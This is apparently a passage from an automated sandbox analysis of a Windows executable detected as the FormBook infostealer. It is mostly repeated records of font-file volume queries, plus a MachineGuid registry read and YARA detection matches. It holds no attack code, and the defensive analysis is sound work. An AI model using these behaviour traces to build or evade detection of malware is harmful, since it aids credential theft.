          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
